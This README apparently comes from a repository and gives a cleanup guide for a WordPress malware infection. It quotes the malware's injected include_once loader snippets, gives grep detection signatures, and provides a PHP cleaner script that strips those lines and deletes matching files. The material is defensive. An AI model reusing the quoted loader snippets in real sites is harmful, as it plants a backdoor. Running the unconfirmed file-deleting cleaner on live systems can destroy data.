Remove WordPress Virus Malware PHP basename() include_once()

README.md

if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { 
    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); 
}

if ( file_exists( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php') ) {
    include_once( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php');
}

Плюс вручную удаляйте последние 10 строк из wp-load.php в корне

if ( function_exists( 'wp_get_themes' ) && !class_exists( "a63467b6877f10ff786464bd302220def" ) ) {
	foreach ( wp_get_themes() AS $a86e74dc91020e46f5dced9e2b163b803 => $a2ba22c0568156555a195820f8e36d8c0 ) {
		$a4e441f464527272c3fe8316e60c6b9fd = get_theme_root() . "/{$a2ba22c0568156555a195820f8e36d8c0->stylesheet}/.{$a2ba22c0568156555a195820f8e36d8c0->stylesheet}.php";
		if ( file_exists( $a4e441f464527272c3fe8316e60c6b9fd ) ) {
			include_once $a4e441f464527272c3fe8316e60c6b9fd;
			if ( class_exists( "a63467b6877f10ff786464bd302220def" ) ) break;
		}
	}
}

Поиск вирусов через консоль

find /path/to/site -name "*.php" -type f -exec grep -l "md5( sha1( md5(" {} \;
find /path/to/site -name ".class-wp-cache.php" -type f

You are probably here because you Google'd the above PHP code.

I searched Google, but couldn't find a working solution, so I wrote one!

My understanding of this virus / malware is that it creates a lot of publicly accessible files within WordPress which are an obfuscated file manager for scumbags to access anything they want inside WordPress. These files also reinfect other WordPress files when ran.

The obfuscated php files are included using include_once() in key wordpress files so that it is constantly being ran when people visit your website, making it is hard to remove.

The Process

Uploade the attached clean.php file into your home or wordpress directory and run to find all infected files.

php clean.php

clean.php will display all injected files and let you know that it cleaned them. It will run twice to make sure it got all it could find.

You can do this on live. I have used this around 6 times now and it does not break the website, but I aways suggest you make a backup first.

Your site should now be fixed!

clean.php

<?php
echo 'Scanning ... ';
scanPhp(__DIR__);
echo ' DONE!' . PHP_EOL;

echo PHP_EOL.'Running a second time to make sure. If no infected files are found, you\'re good! ... ';
scanPhp(__DIR__);
echo ' DONE!' . PHP_EOL;

function scanPhp($dir)
{
    $filter = '/\.php$/';
    $files = scandir($dir);
    foreach ($files as $key => $value) {
        $path = realpath($dir . DIRECTORY_SEPARATOR . $value);
        if (!is_dir($path)) {
            if (empty($filter) || preg_match($filter, $path)) cleanFile($path);
        } elseif ($value != "." && $value != "..") {
            scanPhp($path);
        }
    }
}

function cleanFile($path)
{
    $file = file_get_contents($path);
    $string1 = "md5( "."sha1( md5(";
    if (strripos($file, $string1) !== false) {
        echo 'Found in: ' . $path . ' ... ';
        unlink($path);
        echo 'REMOVED!' . PHP_EOL;
        return;
    }

    // Определяем строки для проверки
    $string2_windows = "if ( file_exists( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php') ) {\r\n    include_once( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php');\r\n}\r\n";
    $string2_unix = "if ( file_exists( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php') ) {\n    include_once( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php');\n}\n";

    // Проверяем наличие строк и удаляем их
    if (strripos($file, $string2_windows) !== false) {
        echo 'Found in: ' . $path . ' ... ';
        $file = str_replace($string2_windows, '', $file);
        file_put_contents($path, $file);
        echo 'CLEANED!' . PHP_EOL;
    } elseif (strripos($file, $string2_unix) !== false) {
        echo 'Found in: ' . $path . ' ... ';
        $file = str_replace($string2_unix, '', $file);
        file_put_contents($path, $file);
        echo 'CLEANED!' . PHP_EOL;
    }

    // Проверка для старой строки
    $string3_windows = "if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) {\r\n    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' );\r\n}\r\n";
    if (strripos($file, $string3_windows) !== false) {
        echo 'Found in: ' . $path . ' ... ';
        $file = str_replace($string3_windows, '', $file);
        file_put_contents($path, $file);
        echo 'CLEANED!' . PHP_EOL;
    }
    
    $string3_unix = "if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) {\n    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' );\n}\n";
    if (strripos($file, $string3_unix) !== false) {
        echo 'Found in: ' . $path . ' ... ';
        $file = str_replace($string3_unix, '', $file);
        file_put_contents($path, $file);
        echo 'CLEANED!' . PHP_EOL;
    }
}